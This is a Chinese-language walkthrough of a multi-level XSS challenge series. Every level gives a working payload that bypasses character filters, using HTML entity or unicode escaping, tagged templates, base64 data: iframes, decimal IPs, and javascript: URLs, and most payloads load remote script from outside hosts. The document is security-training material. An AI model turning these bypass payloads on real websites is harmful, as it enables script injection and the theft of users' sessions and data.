独孤九剑xss通关教程

独孤九剑第一式：

这里过滤了 =()

构造payload：

?data="><svg><script>%26%23x65%3B%26%23x76%3B%26%23x61%3B%26%23x6c%3B%26%23x28%3B%26%23x6c%3B%26%23x6f%3B%26%23x63%3B%26%23x61%3B%26%23x74%3B%26%23x69%3B%26%23x6f%3B%26%23x6e%3B%26%23x2e%3B%26%23x68%3B%26%23x61%3B%26%23x73%3B%26%23x68%3B%26%23x2e%3B%26%23x73%3B%26%23x6c%3B%26%23x69%3B%26%23x63%3B%26%23x65%3B%26%23x28%3B%26%23x31%3B%26%23x29%3B%26%23x29%3B</script></svg>#with(document)body.appendChild(createElement('script')).src='http://xcao.vip/test/alert.js'?data=1%22%3E%3Cscript%3Edocument.write` \u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0078\u0063\u0061\u006f\u002e\u0076\u0069\u0070\u002f\u0078\u0073\u0073\u002f\u0061\u006c\u0065\u0072\u0074\u002e\u006a\u0073\u0022\u003e \u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e`%3C/script%3E%3C!--)

解码后就是这样，这里是因为在 svg 下面的 script 可以使用 html 编码，利用 html 编码绕过=() 的过滤

?data=">#with (document)body.appendChild(createElement(‘script’)).src=‘http://127.0.0.1/xss/alert.js’

成功通关

独孤九剑第二式：

这里过滤了 =(). 新增了.的过滤利用 setTimeout 以及``代替括号，同时采用\u 编码绕过对()和.的限制

构造payload：

http://xcao.vip/test/xss2.php?data=xxx%22%3E%3Cscript%3EsetTimeout`\u0065\u0076 \u0061\u006c\u0028\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\ u0061\u0073\u0068\u002e\u0073\u006c\u0069\u0063\u0065\u0028\u0031\u0029\u0029 `;%3C/script%3E#with(document)body.appendChild(createElement('script')).src='ht tp://xcao.vip/xss/alert.js'

成功通关

独孤九剑第三式：

过滤了 ().&#\ 注意和第二题的不同，放开了=的过滤，新增了&#\的过滤

没有过滤=了，可以直接用 script 加载，然后利用%2e URL 编码绕过对点号的过滤

构造payload：

http://xcao.vip/test/xss3.php?data=%22%3E%3Cscript%20src=http://xcao%252evip/xs s/alert%252ejs%3E%3C/script%3E

成功通关

独孤九剑第四式：

过滤了 =().&#\

%编码还能用，可以使用 javascript 伪协议+URL 编码的方法，使用 location.replace 方法引入 javascript 协议，由于 location.replace 里面的参数是连接，里面必然可以使用 URL 编码，因此顺利绕过，把().分别用 %2528 %2529 %252e 编码，因为 location 是 URL,因此后自动解码 URL 编码。

利用iframe标签然后配合base64编码的js加载

构造payload：

http://xcao.vip/test/xss4.php?data=1%22%3E%3Cscript%3Etop[%22document%22][%22write%22]`${top[%22String%22][%22fromCharCode%22]`61`%2b%22data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3hjYW8udmlwL3hzcy9hbGVydC5qcz48L3NjcmlwdD4=%3E111%3C/iframe%3E%22}%20%3Ciframe%20src`%3C/script%3E%3C!--

成功通关

独孤九剑第五式：

过滤了 ().&#% 这里和第四题的区别是新增了%的过滤，同时不再过滤=，因为和第三题比较只是多了一个%的过滤，因此沿用第三题的思路，这里想到了一个 IP 十进制的方法，把 IP 地址转换成十进制不就没.了吗。 alert.js 好处理，可以用自己的一个域名跳转到目标域名，自己域名链接不要带.就行

http://xcao.vip/test/xss5.php?data=%22%3E%3Cscript%20src=http://2067398186/xxx% 3E%3C/script%3E 构造payload： http://xcao.vip/test/xss5.php?data=1%22%3E%3Cscript%3Etop[%22document%22][%22write%22]`${top[%22String%22][%22fromCharCode%22]`61`%2b%22data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3hjYW8udmlwL3hzcy9hbGVydC5qcz48L3NjcmlwdD4=%3E111%3C/iframe%3E%22}%20%3Ciframe%20src`%3C/script%3E%3C!--

成功通关

独孤九剑第六式：

过滤了 =().&#%

构造payload：

http://xcao.vip/test/xss6.php?data=1%22%3E%3Cscript%3Etop[%22document%22][%22write%22]`${top[%22String%22][%22fromCharCode%22]`61`%2b%22data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3hjYW8udmlwL3hzcy9hbGVydC5qcz48L3NjcmlwdD4=%3E111%3C/iframe%3E%22}%20%3Ciframe%20src`%3C/script%3E%3C!--

成功通关

另外的payload：

http://xcao.vip/test/xss6.php?data=%22%3E%3Ciframe%3E%3C/iframe%3E%3Cscript%3Ef rames[0][%22location%22][%22replace%22]`data:text/html;base64,PHNjcmlwdCBzcmM9a HR0cHM6Ly9ldmlsNy5jbi90ZXN0L3hzcy5qcz48L3NjcmlwdD4`%3C/script%3E

成功通关

独孤九剑第七式：

过滤了 =().&#%<>，输入点在js里

将=，<，>进行ascii编码，有效载荷稍作修改即可

http://xcao.vip/test/xss7.php?data=%22%22;top[%22document%22][%22write%22]`${top[%22String%22][%22fromCharCode%22]`60`%2b%22iframe%20src%22%2btop[%22String%22][%22fromCharCode%22]`61`%2b%22data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3hjYW8udmlwL3hzcy9hbGVydC5qcz48L3NjcmlwdD4=%22%2btop[%22String%22][%22fromCharCode%22]`62`}`

成功通关

构造payload：用 hash 保存工具向量

http://xcao.vip/test/xss7.php/?data=1;[]['constructor']['constructor']`a${locat ion['hash']['slice']`1`}```#with(document)body.appendChild(createElement('scrip t')).src='http://xcao.vip/xss/alert.js'

成功通关

独孤九剑第八式：

过滤了 =().&#%<>’”[]，新增’”[]的过滤。

利用 base64

http://xcao.vip/test/xss8.php?data=Function`b${atob`ZG9jdW1lbnQud3JpdGUoIjxzY3J pcHQgc3JjPScveHNzL2FsZXJ0LmpzJz48L3NjcmlwdD4iKQ`}```

成功通关

独孤九剑第八-1 式：

过滤了 =().&#%<>’”{}，新增{}的过滤。放开[]的使用权，没有了{}就没法使用 js 模板了，那攻击向量存哪儿呢？ Function`name```肯定是不行的但是别忘了万能的伪协议

base64

http://xcao.vip/test/xss8-1.php?data=atob`ZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgc3JjP ScveHNzL2FsZXJ0LmpzJz48L3NjcmlwdD4iKQ`;location[`replace`]`javascript:a`

成功通关

独孤九剑第八-2 式：

过滤了 =().&#%<>’”[] Function，相对于第 8 式新增 Function 的过滤（这是不是像极了 struts2 修复漏洞的方式）第八关的解法不能用[]和引号，那么是不是必须要在 window 下面另外找一个方法来替代 Funtion 呢？ setTimeout? open? 先看看 open 的参数

window.open(‘page.html’, ‘newwindow’, ‘height=100, width=400, top=0, left=0, to olbar=no, menubar=no, scrollbars=no, resizable=no, location=no, status=no’)

如果我们能控制第二个参数就可以了，因为可以用

open(“javascript:name”,“img src=x οnerrοr=alert(domain.domain)>”) //请忽略浏览器拦截

这里需要复习一下 js 模板的方法调用

aaaaa${1}bbb${2}ccc

相当于就是,传递了三个参数

[“aaa,bbb,ccc”, “1”, “2”]

因此我们可以构造

openjavascript:name//${atobPGltZyBzcmM9eCBvbmVycm9yPXdpdGgob3BlbmVyLmRvY3VtZW 50KWJvZHkuYXBwZW5kQ2hpbGQoY3JlYXRlRWxlbWVudCgnc2NyaXB0JykpLnNyYz0naHR0cDovL3hjY W8udmlwL3hzcy9hbGVydC5qcyc+}

构造payload

http://xcao.vip//test/xss8-2.php?data=openjavascript:name//${atobPGltZyBzcmM9 eCBvbmVycm9yPXdpdGgob3BlbmVyLmRvY3VtZW50KWJvZHkuYXBwZW5kQ2hpbGQoY3JlYXRlRWxlbWV udCgnc2NyaXB0JykpLnNyYz0naHR0cDovL3hjYW8udmlwL3hzcy9hbGVydC5qcyc%2b}

成功通关

文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。

免责声明：由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。

博客:
https://rdyx0.github.io/先知社区：
https://xz.aliyun.com/u/37846SecIN:
https://www.sec-in.com/author/3097CSDN:
https://blog.csdn.net/weixin_48899364?type=blog公众号：
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirectFreeBuf：
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85